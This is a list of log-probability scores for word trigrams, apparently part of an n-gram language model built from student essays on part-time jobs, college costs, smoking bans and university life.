-0.7776412 from lower socio-economic
-0.5417812 lower socio-economic backgrounds
-1.9605794 need to partly
-1.4303986 that can complete
-2.5104034 is a complete
-0.9700162 represent the complete
-2.1553102 time , complete
-0.9677393 lessons , complete
-2.1749327 time to complete
-0.8768611 can actually complete
-1.0997503 even lose complete
-0.93832445 their society professionally
-1.7514766 as an educated
-1.8890293 also be contributing
-0.9709622 responsible , contributing
-0.970158 confident and contributing
-1.3583838 much better prepared
-2.472632 for the challenges
-2.6509278 of the challenges
-1.8459611 after college ends
-1.6341007 students can develop
-1.8584001 students to develop
-2.3887694 able to develop
-2.70212 college students develop
-0.95771194 part-time also develop
-1.8326062 and they develop
-1.2578272 company or develop
-0.9539341 make one stronger
-1.2350935 to develop stronger
-2.2082727 time , appropriately
-0.5417812 , appropriately dressed
-0.91877997 are real consequences
-0.8778697 to her actions
-1.5464375 which can wait
-0.9709195 than to wait
-1.8017014 to make naive
-0.5417812 make naive mistakes
-1.2480236 during this critical
-2.0517251 that is critical
-0.97014666 activities of critical
-1.2678738 point in favor
-1.8589714 with a variety
-1.2467027 through a variety
-0.95874107 develop a variety
-1.0185608 a wider variety
-0.9687079 know their classmates
-0.7775762 there again classmates
-2.0007648 , but maybe
-1.8329598 spend time together
-2.3040137 to work together
-0.70521736 time communicating together
-0.5414925 <s> Living together
-0.5414925 possibly gather together
-0.970309 living and thinking
-1.5664853 way of thinking
-1.3737603 is much closer
-1.849453 to get along
-1.1755809 is my belief
-1.3322551 support my belief
-2.661735 students to recognize
-0.962298 universities should recognize
-0.9653157 flexible with lectures
-0.9693766 awake in lectures
-0.97014666 content of lectures
-1.270913 lectures , meetings
-0.8186068 after hour meetings
-0.96313107 students from poorer
-1.0553755 at a disadvantage
-0.8426969 a disadvantage compared
-1.25513 people from wealthy
-1.4357537 parents are wealthy
-0.964825 owners can pass
-1.2705404 lives , pass
-1.9515113 work and pass
-0.970705 families to pass
-2.3513172 with the ever
-1.2274852 who has ever
-0.81495047 society without ever
-0.81495047 education without ever
-0.9710474 interview , experiencing
-1.0063916 without ever experiencing
-1.7397777 working in regular
-0.96546555 health as regular
-0.7054753 ever experiencing regular
-2.0385296 not have empathy
-1.4202173 people in modern
-0.96229005 common in modern
-2.3173888 <s> The modern
-0.96952105 also in politics
-0.97038597 balance and justice
-0.9488822 Universities could award
-0.5417812 could award credits
-1.4141771 who do volunteer
-2.6336813 to the all-round
-0.9623525 therefore should count
-0.8636325 and especially towards
-1.0921655 , particularly towards
-0.70534635 their attitude towards
-0.5415809 should count towards
-0.96877724 towards their degrees
-0.96934706 School is expensive
-1.7506906 is very expensive
-0.96546555 living as expensive
-0.962466 and is costly
-0.962466 food is costly
-0.96116084 other jobs assisting
-1.9483092 <s> For busy
-2.3839705 they are busy
-0.54166937 jobs assisting busy
-0.7776412 assisting busy professionals
-1.2015057 or other sources
-0.96559507 however I doubt
-1.3404553 is no doubt
-1.558634 and I spent
-1.2246728 what I spent
-2.3985302 should be spent
-0.96517015 time not spent
-1.8153983 the time spent
-1.2321516 much time spent
-2.120794 in college spent
-1.3554705 much better spent
-0.93199706 the years spent
-1.2695947 up and figuring
-1.2632909 always be personally
-1.6570313 what is personally
-0.8883211 , both personally
-0.9708349 Although the usual
-1.2118845 very valuable form
-2.5320156 in the form
-1.6820555 in some form
-1.2002534 any other form
-0.5414925 spontaneous feedback form
-0.96873605 if that profession
-2.0572884 would be nice
-2.5939465 have a nice
-1.2707573 way to speed
-1.593561 can get certified
-0.970309 certified and receive
-0.96781194 effort to receive
-0.96781194 fortunate to receive
-0.8970103 their degree faster
-1.0064437 the expectations faster
-1.5693139 means to raise
-1.1542566 for their children
-2.1085467 of their children
-0.94568 raise their children
-2.309394 <s> The children
-1.2122273 for his children
-0.5415809 no longer children
-1.8898462 having to choose
-1.2544696 freedom to choose
-1.4214691 right to choose
-2.1710527 if they choose
-0.9534383 customers who choose
-0.9554413 life would choose
-0.9139306 n't always choose
-2.1568217 them to interact
-0.9709622 membership , community
-0.9650539 club or community
-0.8776273 their local community
-0.8453008 them various epeople-skills
-1.8562675 <s> I had
-1.3326421 that I had
-1.4177648 when I had
-1.2578863 but not had
-1.438929 college and had
-2.505258 college students had
-0.95726424 few students had
-0.9463543 at but had
-0.9649056 from college had
-0.96510494 cases have had
-1.260992 since they had
-0.9524287 co-workers who had
-0.9427098 I myself had
-0.8867519 efforts someone had
-1.6340977 I was 14
-0.9583013 fre also old
-2.156481 students are old
-0.93270886 14 years old
-0.8778697 a local pharmacy
-1.5470109 more than capable
-0.9599652 : an appreciation
-0.54174346 <s> Early appreciation
-1.8506978 time is required
-0.8635832 necessary level required
-0.96711266 hours are required
-1.1811657 the effort required
-0.70521736 is absolutely required
-0.95859265 school by interacting
-2.280572 with the public
-2.463656 for the public
-0.9692625 non-smokers in public
-0.96997774 private and public
-1.828603 in all public
-2.0708947 how to juggle
-0.94811535 was very surprised
-0.94110245 I first came
-1.2591032 student can bring
-0.9671011 dedication they bring
-0.95854473 bring more maturity
-0.9702419 coin a currently
-2.3839705 they are currently
-1.7702258 in Japan currently
-1.2672445 opinion is purely
-0.89666134 is just purely
-0.5415809 time devoted purely
-0.5415809 such facilities purely
-1.2641429 reasons are 1
-1.4133956 learn many interesting
-1.3406804 is no replacement
-1.5692856 world , 2
-2.017308 students have 2
-1.8953348 pay for everything
-1.4441268 used to everything
-0.94361335 taken-on then everything
-0.96582973 or have everything
-2.055777 <s> If everything
-0.77699226 given almost everything
-0.96920437 everything is given
-1.7840121 They are given
-2.06044 <s> If given
-1.3555913 have been given
-0.970158 hiring and 3
-0.8424733 the next 3
-1.851822 job that relates
-2.594901 have a salary
-0.92716146 on a resume
-1.2605371 out a resume
-0.8186068 very short 4
-1.5679898 friends and mentors
-1.2597992 I will explain
-1.4364045 job to survive
-2.401189 able to survive
-0.97041446 often a struggle
-2.3556416 with the continual
-1.7212825 are many excellent
-1.9542363 is an excellent
-2.2748258 with the long
-1.5531294 during the long
-1.997152 will have long
-0.96692693 days are long
-0.9577698 make life long
-0.86343884 negatively impact long
-0.54140407 <s> Before long
-1.1014369 the long length
-0.97025436 length of vacation
-1.1012999 the long vacation
-1.7844788 could be greatly
-1.246169 would also greatly
-1.3617146 is often wasted
-0.7055833 be greatly wasted
-0.94811535 become very lazy
-0.970309 lazy and unproductive
-2.0009396 lead to unproductive
-0.86392206 , late nights
-1.3168118 a few nights
-1.8995838 pay for travel
-1.5481734 a young persons
-0.9573025 individual fs growth
-0.9139306 and personal growth
-0.7771444 fs mental growth
-0.5414925 young persons growth
-0.70521736 and sexual growth
-0.9410907 and often multicultural
-0.970158 on and off
-0.9381157 cases well off
-0.77750957 approach paid off
-1.3562273 the statement eIt
-0.97038597 personal and employability
-1.71038 the same field\/industry
-2.472632 for the ereal
-2.4508793 in the ereal
-2.1287076 are not suited
-2.7040782 <s> I look
-1.4217988 be to look
-1.858489 chance to look
-1.6262139 had to look
-2.283659 students should look
-0.90357953 -RRB- employers look
-2.630871 to the path
-0.9306954 different career path
-2.0118377 with their homework\/assignments
-0.94110227 have valuable input
-2.6689322 , and using
-2.1901503 value of using
-2.0306695 such as using
-2.379855 they are using
-0.9687079 using their initiative
-1.702908 their own initiative
-0.8778697 , problem solving
-0.9710908 solving , communication
-2.3548498 for the customer
-2.368377 to the customer
-0.9623027 onto the customer
-1.445843 teamwork , customer
-2.0118377 with their uniforms
-1.6173695 working part-time brings
-1.270913 instance , brings
-2.4202912 should be pointed
-1.4347692 jobs provide real-world
-1.5466692 which can complement
-0.9698608 fs the spending
-0.96499443 from not spending
-1.7970217 studies and spending
-1.419718 some extra spending
-0.94248736 or out spending
-1.6956787 their own spending
-0.8176309 attitude towards spending
-0.54122734 towards unreasonable spending
-2.512545 it is certainly
-1.9664009 there is certainly
-0.9650915 which will certainly
-0.9708606 weekends , certainly
-1.4048691 a degree certainly
-0.9672094 certainly be welcome
-2.2383718 as a welcome
-1.2947335 is always welcome
-0.96996903 given a choice
-2.1427934 <s> This choice
-1.1635808 in personal choice
-1.1184012 The best choice
-0.70521736 the wise choice
-0.95028013 work which complements
-0.9710908 times , looking
-1.43103 for work within
-2.375778 they are within
-0.8182215 proper burden within
-0.84479624 communicating together within
-0.9467725 Banning smoking within
-1.2666297 required for lab
-1.2695354 within a lab
-2.2383718 as a research
-2.106554 field of research
-1.8073757 <s> A research
-0.7776412 a research assistant
-2.0645247 to a professor
-1.7315739 by their professor
-2.065188 to a well-paying
-0.97038597 well-paying and conveniently
-0.5417812 and conveniently located
-1.2704892 enrich the content
-1.2637693 even be desirable
-2.058414 not be interested
-0.96857595 not that interested
-2.125482 are not interested
-0.94453686 studies -LRB- although
-1.7420774 , this scenario
-0.5417812 this scenario leads
-0.7776412 to certain existentially
-0.5417812 certain existentially themed
-0.5417812 existentially themed questions
-0.96602863 does it profit
-1.1560407 can still profit
-1.7395061 time and prioritize
-1.7370406 There is merit
-0.95346725 has some merit
-2.2595627 is a significant
-2.1175108 , a significant
-1.2468128 puts a significant
-0.92224765 very high expense
-1.0183387 a significant expense
-1.3813438 a large expense
-1.9593399 have the capital
-1.2653071 materials , thereby
-0.96822786 products , thereby
-2.509753 , and thereby
-1.7131681 education and thereby
-1.7390541 education and cover
-1.8978041 and to cover
-2.1297407 have to cover
-1.8112383 money to cover
-1.2696514 out a bank
-0.96394134 sponsored student loan
-1.2691407 government and loan
-0.54166937 a bank loan
-0.94553554 cases even mortgaging
-0.96877724 mortgaging their house
-2.677245 , and puts
-2.147531 <s> This puts
-0.7054753 educational institutes puts
-1.862575 amount of strain
-0.96550435 families with financing
-0.9708606 support , materials
-1.4426589 books and materials
-1.2418526 or study materials
-0.4288826 and educational materials
-1.2653924 argument , reducing
-0.96827096 thereby , reducing
-2.3195124 , the pressure
-1.253769 ease the pressure
-1.253769 reducing the pressure
-1.8046691 parents and encouraging
-1.1334231 , a large
-1.246229 believe a large
-1.246229 puts a large
-1.2240174 of most large
-0.9330775 public at large
-0.9330775 population at large
-0.70534635 the relatively large
-0.7949131 a large percentage
-1.269442 percentage of shoppers
-1.6657484 to take notice
-0.97025436 notice of changes
-1.1841569 work environment changes
-0.96952105 changes in fashion
-0.97038597 fashion and technology
-1.2588686 we can buy
-1.9171195 want to buy
-1.836188 not only buy
-2.6509278 of the latest
-0.9674895 buy the latest
-0.8426969 the latest products
-1.0065018 , thereby reviving
-0.8778697 at local shops
-1.9996837 may be low
-1.4445101 take a low
-0.96934706 cost is low
-1.5868083 , so shop
-0.5417812 so shop owners
-0.7055833 these savings onto
-0.92561936 then going onto
-1.9922076 important to me
-0.8958022 has benefit me
-0.8440098 simply allow me
-0.8871436 also made me
-0.8626537 look around me
-0.7767397 and puts me
-0.541139 that enabled me
-0.541139 jobs provided me
-0.541139 it gave me
-2.1571712 , it seems
-0.94952345 nowadays it seems
-2.0975175 <s> It seems
-1.5475363 This will carry
-1.2694414 others and carry
-0.8453008 out various task
-0.97010547 accomplish a goal
-2.309394 <s> The goal
-0.34232748 the primary goal
-0.34232748 The primary goal
-0.5415809 was original goal
-1.7834284 could be rewarding
-1.3800496 be very rewarding
-1.2112899 is quite rewarding
-0.9314439 not to mention
-0.970309 future and seeing
-1.5481491 based on seeing
-0.9709693 sense to payback
-0.96997774 pastime and over
-1.637473 a little over
-0.70534635 much preferred over
-0.70534635 will carry over
-1.221502 work there everyday
-0.94453824 over into everyday
-1.0482398 will show irresponsible
-1.0784745 and eventually breakdown
-1.6168926 in this economic
-0.97063816 breakdown the economic
-1.4431605 terms of economic
-1.9028492 which is happing
-2.5330536 is a false
-1.078693 the credit card
-0.96771944 companies are constantly
-0.5417812 are constantly pushing
-1.0181831 to take care
-0.81864053 are taken care
-2.8185043 of the bill
-0.8309274 should be banned
-1.5623559 smoking is banned
-0.9093544 cards were banned
-1.2445077 have already banned
-2.144209 for a number
-1.6386443 are a number
-1.2697871 reducing the number
-1.3807995 a large number
-0.38064998 the total number
-1.1501412 student who goes
-0.9063158 anyone who goes
-1.1841569 smoky environment goes
-1.2261672 if you didn
-0.84522486 in University didn
-0.97041446 pay a dime
-0.8453008 their University tuitions
-0.9703562 following a summer
-1.5622797 during their summer
-0.70563835 their summer vacations
-2.548219 in the summers
-0.95623523 a study schedule
-1.5726613 , work schedule
-0.9506409 firm work schedule
-1.838337 the real schedule
-0.92209035 full-time class schedule
-1.3805264 job I got
-2.1558096 , I got
-1.0512629 work after graduating
-0.7960496 got after graduating
-0.7960496 teenagers after graduating
-1.9458301 , is already
-1.454685 I have already
-1.6400855 they have already
-0.90340173 Japan have already
-0.90340173 US have already
-0.8424733 I fd already
-0.86400133 fd already experienced
-1.9294705 by the requirements
-2.6509278 of the requirements
-0.96203786 waste money c
-0.9382523 so well c
-1.4349594 only be seen
-0.54174346 be plainly seen
-1.4387722 look for extra-curricular
-0.9708606 hobbies , extra-curricular
-0.97001797 impact of extra-curricular
-1.2006366 any other extra-curricular
-0.90981555 activities before hiring
-2.4549673 in a bubble
-0.9039227 however upon leaving
-1.2707431 debt , leaving
-1.376193 job after leaving
-2.5939465 have a head
-1.97698 student fs head
-0.9692625 start in creating
-0.96997774 awareness and creating
-1.5498371 or even creating
-0.9442476 energies into creating
-2.8185043 of the failures
-1.3828995 that has realistic
-0.96671176 easier time adjusting
-1.7198843 of work \/
-2.552962 for the employees
-1.1711544 of restaurant employees
-2.4938304 to have employees
-1.5669839 <s> These employees
-0.81838614 from fellow employees
-0.96873605 employees that wont
-0.5417812 that wont burn
-1.2707573 way to gauge
-0.95859265 is by assessing
-1.5693139 ability to multi-task
-0.9710908 know , grade
-0.88859946 grade point averages
-0.96644884 employers have devised
-1.6617393 kind of formula
-0.7776412 The employer feels
-2.6879861 , and excels
-0.96005386 complete an assignment
-0.8186068 <s> h Finally
-2.5418718 in the general
-1.4408765 people in general
-2.677245 , and general
-0.5417812 <s> Idle minds
-2.4372787 the student deserves
-0.96894807 income for needy
-0.95398855 families who face
-1.270097 when the difficulties
-1.2691181 because of difficulties
-0.9380174 face financial difficulties
-0.8453008 and basic necessities
-0.9710474 five , purchase
-1.7912338 help students purchase
-1.9606785 work , dedication
-0.970309 focus and dedication
-0.8186782 especially towards unreasonable
-0.9708349 recognize the inherent
-1.5699025 <s> These structures
-0.96873605 structures that exist
-1.2702949 they start formal
-0.8186068 and using formal
-1.0065018 and thereby adjust
-2.4867222 able to demand
-2.330938 part-time jobs demand
-0.70563835 jobs demand involvement
-0.9579728 or my private
-0.54174346 <s> Both private
-0.97025436 are of utmost
-0.9687079 do their utmost
-2.0678182 <s> In New
-1.2677768 student in New
-0.34242433 In New Zealand
-0.34242433 in New Zealand
-1.7298989 jobs that enabled
-2.498766 to have continued
-1.2672445 only is tertiary
-0.9582222 required by tertiary
-1.1748779 with my tertiary
-1.1748779 all my tertiary
-0.8422966 <s> Attending tertiary
-0.9580532 pay my monthly
-0.96894807 rent for housing
-1.2667356 common for teenagers
-0.9709693 university to move
-1.961418 and to spread
-0.96877724 spread their wings
-1.3800086 job I wanted
-1.2258196 whatever I wanted
-0.9478791 whatever you wanted
-1.1888787 never really wanted
-1.961418 and to prove
-1.4436442 care of yourself
-0.9615076 jobs at entertainment
-1.1010312 or simply entertainment
-0.8184666 expenses including entertainment
-0.8186782 a government sponsored
-1.3973616 , which covered
-1.8825274 , there wasn
-1.9997865 will be left
-2.200765 should be left
-1.4194937 enough money left
-2.2413182 as a gas
-0.5417812 a gas station
-0.54174346 gas station attendant
-0.54174346 , parking attendant
-1.2709996 attendant , kitchen
-1.5696235 hand , video
-0.97025436 periods of video
-0.70563835 , video rental
-0.5417812 video rental clerk
-0.9710908 clerk , parking
-1.4289291 When I finally
-0.9708606 concentration , finally
-0.96997774 waiter and finally
-0.9142505 before he finally
-0.70563835 a hotel porter
-1.2514111 of jobs provided
-0.9397345 developed better communicative
-2.0708947 how to organize
-0.95854473 finances more efficiently
-0.96394134 contribute student opinions
-1.389102 in these opinions
-0.59827137 have three opinions
-1.5161182 to gain hands
-1.3259969 to obtain hands
-1.5668873 from a textbook
-2.814478 of the textbook
-2.4372787 the student selected
-0.9566213 All study programs
-1.8101084 Therefore , seeking
-2.1597657 students are unsure
-0.97038597 unsure and undecided
-1.2638448 choosing the direction
-0.9674895 discovering the direction
-0.95854473 offer more options
-2.2198038 for a brighter
-0.9488822 job could inspire
-1.8887631 is to excel
-2.5889456 students to excel
-0.96877724 until their senior
-1.8654387 difficult to comprehend
-1.8556154 time in discovering
-0.97041446 last a lifetime
-1.435987 parents are helping
-2.001421 lead to unmotivated
-1.3406804 is no sadder
-0.5417812 no sadder story
-1.7334363 college is finished
-1.3823861 that has finished
-2.1864977 they have finished
-0.7776412 has finished 16
-1.5693139 only to run
-1.9197172 job can challenge
-0.91869646 The real challenge
-2.0385296 not have tried
-1.2468667 also , dealing
-2.0381393 time , dealing
-1.7842045 -RRB- , dealing
-1.4103463 teamwork , dealing
-0.95903134 first experience dealing
-2.0291033 such as dealing
-0.8634614 , especially dealing
-0.8447202 even though dealing
-1.1517396 with a boss
-1.4095671 job also shows
-0.93289757 are no longer
-0.9040364 it upon ourselves
-0.7775762 fs ask ourselves
-1.9360528 not be taught
-1.6508119 should be taught
-2.094723 be a special
-1.2695947 people and colleagues
-2.4946728 students to grow
-0.9631001 continues to grow
-0.9631001 hurry to grow
-1.2232125 grow up quicker
-1.2105547 learn about glife
-0.968572 encourage their kids
-1.2947651 <s> Most kids
-0.93262225 my own kids
-0.9708349 reach the correct
-1.8046691 parents and grandparents
-1.7016098 <s> Many youngsters
-1.408056 today fs consumerist
-1.7034411 their own cell
-0.5417812 own cell phones
-0.5417812 cell phones funded
-0.96952105 always in possession
-0.8426969 the latest games
-0.970309 games and clothes
-0.34240606 , fancy clothes
-0.34240606 my fancy clothes
-1.2695354 earning a wage
-0.7055833 , minimum wage
-1.2881583 for example communicating
-1.8815657 of time communicating
-2.618974 to the groups
-1.2418526 or study groups
-1.6854635 and social groups
-0.9036761 of age groups
-1.2246553 into social etiquette
-0.87785065 , business etiquette
-0.70563835 using formal spoken
-0.5417812 formal spoken language
-1.636735 , I wish
-1.5611119 as I wish
-1.3784518 if they wish
-1.2362063 If they wish
-1.702165 those who wish
-1.9151727 with a teacher
-1.7133067 become a teacher
-2.4549673 in a nursery
-2.217416 , or cram
-1.9491554 work in tourism
-1.5335443 work at hotels
-0.8778697 as local tour
-0.5417812 local tour guides
-1.5799317 on the weekends
-2.313727 <s> The weekends
-0.9615076 guides at weekends
-1.7518127 is very challenging
-0.8885696 many companies receiving
-0.54174346 companies receiving thousands
-0.54174346 alone kills thousands
-1.5687809 be the key
-0.9710908 contacts , leading
-1.5693139 reasons to join
-1.5469642 knowledge of attending
-1.5469642 instead of attending
-0.9554702 stage when attending
-1.2831796 while still attending
-1.5630314 them in obtaining
-0.9470944 fs world obtaining
-0.9252627 family without obtaining
-1.5670048 discipline and time-management
-1.9554842 with a semi-regular
-0.96646357 semi-regular work regimen
-2.069276 from the oppressive
-0.9710908 oppressive , thought-controlling
-0.5417812 , thought-controlling atmosphere
-0.9602795 meet people accustomed
-0.7776412 a welcome shock
-2.6336813 to the cloistered
-1.6622562 such a fascinating
-0.94724894 fascinating world exists
-0.84262145 the challenges exists
-1.2704892 where the recommended
-0.5417812 the recommended norms
-0.9703093 norms of contemporary
-0.93273556 contemporary university thought
-0.7054753 Without concentrated thought
-0.7774487 of critical thought
-0.7776412 university thought patterns
-2.101684 do not apply
-2.3892295 they are mocked
-0.96563625 mocked as absurd
-0.9710908 well , occupying
-0.5417812 , occupying oneself
-0.90404415 an outside activity
-0.8186092 other extra-curricular activity
-0.7054753 in physical activity
-0.96646357 as work restricts
-0.7348234 the bad habits
-0.7348234 develop bad habits
-0.94670403 develop social habits
-0.8181321 poor sleeping habits
-0.8447202 few healthy habits
-0.70521736 their recreational habits
-0.86400133 social habits deleterious
-0.7776412 activities include extended
-0.5417812 include extended periods
-0.70563835 of video game
-0.5417812 video game playing
-1.5697957 hours , lounging
-1.8189086 one fs sofa
-0.5417812 fs sofa watching
-0.5417812 sofa watching daytime
-0.5417812 watching daytime television
-0.9710908 television , indulging
-0.96952105 indulging in repeated
-0.5417812 in repeated bouts
-0.9703093 bouts of binge
-1.259926 drinking with equally
-0.5417812 with equally dissolute
-1.4138292 and an obsessive
-0.5417812 an obsessive devotion
-0.9708217 devotion to online
-0.9433175 from learning online
-0.54166937 <s> Playing online
-0.7776412 to online fleshpots
-0.5417812 online fleshpots promising
-1.2694414 social and sexual
-0.54174346 fleshpots promising sexual
-0.70563835 promising sexual release
-0.96952105 release in exchange
-1.2678866 day is split
-0.8885696 It therefore behooves
-2.663024 students to arrange
-1.2610925 does not bear
-0.5417812 not bear mentioning
-1.2195952 without any REAL
-1.6471208 all the efforts
-1.554918 appreciate the efforts
-1.8488582 from their efforts
-0.54166937 , anti-smoking efforts
-0.9434717 Another good life-lesson
-0.9447781 will hopefully tie-in
-1.828508 well as failure
-0.93289024 our own disciplines
-0.9709693 disciplines to achieve
-2.8185043 of the greatest
-0.5417812 the greatest assets
-1.3262113 to obtain control
-1.2694414 needs and desires
-1.8182739 one fs desires
-1.9617186 young people depend
-1.5951159 the right track
-1.2373589 are so spoiled
-0.9513582 that these spoiled
-0.86376655 have everything paid
-1.2449541 have already paid
-0.8184666 This approach paid
-0.9708349 acquire the much-needed
-1.8189086 one fs self
-1.2483442 during this transitional
-2.531173 is a transitional
-1.2552633 time from dependence
-1.6384287 and I shall
-1.2370702 where we shall
-0.54166937 of reckoning shall
-0.62610734 support my claim
-2.3714485 on the domestic
-0.5417812 the domestic front
-0.8778697 person generally leaves
-0.9708349 leaves the security
-1.3220453 the family unit
-1.6609963 life and begins
-0.7832701 , he begins
-0.7832701 as he begins
-0.8184666 real schedule begins
-1.44561 begins to strike
-1.2696514 during a course-load
-1.0481186 to encourage thoughts
-1.2794791 to explore thoughts
-1.269442 thoughts of pecuniary
-1.7390541 education and changing
-0.94100964 support his changing
-0.9671011 be they hobbies
-0.92229426 enjoying your hobbies
-1.44561 begins to assert
-1.269442 thoughts of starting
-0.96544003 course will vary
-0.9710908 dating , courting
-0.9710474 networking , meeting
-0.8777878 and generally meeting
-0.70563835 generally meeting viable
-0.96550435 people with whom
-0.97025436 means of supporting
-0.922282 modest income supporting
-1.2317078 the reasons stated
-0.8778697 are generally fresh
-2.065188 to a firm
-1.5613524 working for superiors
-0.9434717 all good life-skill
-0.5417812 good life-skill enhancements
-0.96563625 things as filling
-2.347839 a job interview
-0.9708349 experiencing the joys
-1.5687809 as the pain
-1.4116323 of being rejected
-1.9491554 work in cooperation
-0.97038597 low and humble
-0.9514796 perhaps help relieve
-0.9703093 expense of funding
-0.9694666 drinking is involved
-0.7055833 for everyone involved
-2.401044 , I emphatically
-0.9583723 this life style
-0.9676401 these are individuals
-1.5695199 <s> These individuals
-0.94460577 entering into adulthood
-1.9548753 is an indispensable
-0.8186782 would highly recommend
-1.2492541 provide an opportune
-1.2197931 the young men
-0.9652262 men or women
-0.9584591 of more women
-1.2232125 make up THEIR
-0.5417812 up THEIR interpretation
-2.5330536 is a wonderful
-0.95398307 yet what meaning
-2.1276162 are not applied
-0.9652262 learned or applied
-0.9572789 what skills exactly
-1.4184357 working at Dairy
-0.5417812 at Dairy Queens
-2.1237645 money and handling
-0.96203786 as money handling
-1.7034411 their own accounts
-0.9597012 people all add
-0.96602863 when it comes
-0.89706135 With freedom comes
-1.9774289 that is indeed
-1.8872964 , is indeed
-0.9710474 Students , indeed
-1.2653924 nature , reduces
-0.96827096 definition , reduces
-0.9146115 a personal note
-2.7495873 part-time job throughout
-0.7775762 and off throughout
-0.9710908 better , exercised
-2.6254084 to the greater
-0.9452802 in much greater
-0.54166937 , exercised greater
-0.88859946 part-time helps defray
-0.9708349 defray the ever-increasing
-2.509021 time job creates
-0.8452535 college debt creates
-0.97038597 stress and burdens
-0.968682 burdens that newly
-0.9694666 how is newly
-0.70563835 that newly minted
-1.5294753 some cases eliminating
-0.7776412 and mental state
-1.2703568 among the population
-0.7775762 the greater population
-1.9073775 students in contact
-1.6119378 of all walks
-1.2704892 or the myriad
-0.8885845 takes place cwhich
-0.9710908 place , isn
-2.712588 <s> I couldn
-0.8778697 really quite shocked
-2.498766 to have perfected
-1.8046691 parents and begging
-0.96602106 if not outright
-1.4135773 and an outright
-0.70563835 not outright demanding
-2.2182844 that they shell
-0.94353324 shell out outrageous
-1.0063916 even small amounts
-0.54174346 out outrageous amounts
-1.2616659 You have nothing
-0.92816144 fs really nothing
-0.92226976 budget : wrong
-0.7055833 really nothing wrong
-0.9655893 going on ski
-0.5417812 on ski trips
-0.9710908 trips , traveling
-1.2694414 world and enjoying
-1.5664853 instead of enjoying
-0.96879 will for probably
-2.1320326 students , probably
-0.9583013 fll also probably
-0.93076104 earning those dollars
-0.96827096 party , namely
-0.96827096 dollars , namely
-2.512195 , and consequently
-1.2606384 restaurants and consequently
-0.86392206 tertiary educational institutes
-0.7775762 and loan institutes
-2.4356785 the student household
-0.9655786 activities as household
-1.7390559 outside of parental
-0.5417812 of parental accommodation
-0.9447781 is largely financed
-0.8486092 parents or guardians
-0.70563835 an enormous sum
-2.2979906 to be subsidized
-1.4447888 by a third
-2.6843307 , and third
-0.9447781 is rarely adequate
-1.3489032 to balance expenditure
-0.9660901 yet it yields
-0.9703562 yields a double
-0.9465293 Massachusetts after double
-0.70563835 a double bonus
-1.5687809 consider the character-building
-0.5417812 the character-building aspect
-2.0228894 part-time work influences
-1.6550909 necessary for younger
-0.70563835 as household earners
-1.6138352 their future professions
-0.95146203 freedom in terms
-0.95146203 costly in terms
-0.95146203 professions in terms
-1.2709996 commitment , diligence
-2.250717 can be said
-0.96857595 With that said
-1.2611248 <s> That said
-0.97076845 merely the beginning
-1.8041439 studies and beginning
-2.1495302 <s> This relief
-1.2350495 a great relief
-0.9440582 all -LRB- due
-1.9177864 of college due
-0.70534635 great relief due
-0.5415809 rightly unread due
-0.8885696 has been shown
-2.2979906 to be traumatizing
-2.712588 <s> I totally
-1.8016713 reason is pretty
-0.94892174 teacher has similarities
-1.8674259 that will essentially
-1.2691407 learning and essentially
-0.953751 school we essentially
-1.2709996 up , sit
-0.5417812 , sit quietly
-1.2014927 on our feet
-0.97038597 immediate and spontaneous
-0.5417812 and spontaneous feedback
-0.9653139 well or aren
-2.1505525 <s> This dimension
-1.9327028 having to perform
-1.5571167 expected to perform
-1.947449 , is somewhat
-0.5417812 is somewhat lacking
-0.94452345 can spend anyway
-1.5353667 my opinion anyway
-0.9519091 really only remember
-0.9096709 I still remember
-1.2131006 my first paycheck
-2.3053756 and the impression
-2.229128 that it gave
-0.9585499 It also seemed
-1.8541112 , that peculiar
-0.5417812 that peculiar sort
-0.95854473 lot more cautious
-1.3289149 and less apt
-0.7055833 money c Yet
-1.4299678 job I guess
-1.5685177 be the primary
-2.3173888 <s> The primary
-0.8640201 whether club membership
-1.947449 , is supplementary
-1.1014369 the local fast-food
-0.97038597 restaurant and hopes
-2.2413182 as a computer
-0.5417812 a computer programmer
-0.9703562 flip a burger
-1.8067538 , then burger
-0.70563835 then burger flipping
-2.594901 have a decidedly
-2.5876513 have a negative
-0.964643 positive or negative
-1.2338123 the potential negative
-0.5414925 a decidedly negative
-0.70521736 is negligible negative
-0.97041446 particularly a first-year
-0.86400133 is already stretched
-0.5417812 already stretched thin
-1.269442 requirements of college-level
-2.026697 there is negligible
-0.7775762 is almost negligible
-2.4202912 should be fine
-0.9709693 decision to take-up
-1.7176094 , not solely
-0.9446826 be left solely
-0.9683921 at students '
-0.9348126 on restaurants '
-0.70563835 students ' discretion
-2.1568217 them to sharpen
-0.9708349 engineering the in-class
-1.8542573 time is supplemented
-0.7055833 for lab experiments
-0.54174346 or chemistry experiments
-1.2595508 experiments or casework
-1.5500416 makes it virtually
-1.7236131 there are virtually
-0.7055833 it virtually impossible
-0.7055833 become near impossible
-1.774373 and a heavy
-1.7165507 on a heavy
-2.6336813 to the detriment
-1.5648742 engage in physical
-1.7315739 and their physical
-2.482005 is a health
-2.0253468 for the health
-2.0003614 to the health
-1.9326061 on the health
-1.2079276 also the health
-0.93832946 since the health
-0.93832946 affecting the health
-0.93832946 concerning the health
-0.94221365 about any health
-0.95681995 rights and health
-0.95681995 welfare and health
-0.95681995 comfort and health
-0.96953917 prone to health
-1.4332628 , their health
-0.9384824 person 's health
-0.8861649 their potential health
-1.2892576 their personal health
-1.6883714 their own health
-0.843349 potential negative health
-0.70405877 their physical health
-0.5406974 Despite proven health
-0.5406974 by improving health
-2.1505525 <s> This applies
-0.96644884 must have extracurricular
-0.9710908 more , picking
-2.343902 in a healthy
-0.9655088 sustain a healthy
-0.9708606 body , healthy
-0.70534635 definitely wants healthy
-1.3159499 a few healthy
-2.034237 such as devoting
-2.183912 time to exercising
-0.970309 exercising and recreational
-0.9687079 pursuing their recreational
-0.96877724 improve their resumes
-1.5680873 them a well-rounded
-2.3892295 they are introduced
-2.6336813 to the tedious
-0.9620837 this in mind
-0.9620837 excellence in mind
-1.2656678 when their mind
-1.5186512 in my mind
-0.844898 , healthy mind
-0.94732565 its most curious
-1.1843383 a new phase
-2.1214323 will be encountering
-1.2631776 this they share
-2.034237 such as swimming
-1.5473053 class or chemistry
-1.1843383 a new light
-0.5417812 new light bulb
-2.4202912 should be cherished
-2.0936038 they will miss
-2.101911 student to miss
-1.2239969 the social ideas
-1.4049758 the main ideas
-0.92502123 creating new ideas
-0.5415809 and sharing ideas
-1.4452091 understanding the academics
-2.548219 in the dormitory
-2.4184859 should be offered
-1.0705076 in activities offered
-0.8591219 college activities offered
-1.1838939 by being exposed
-2.156481 students are exposed
-0.9554702 ill when exposed
-1.44561 exposed to group
-2.0118377 with their peers
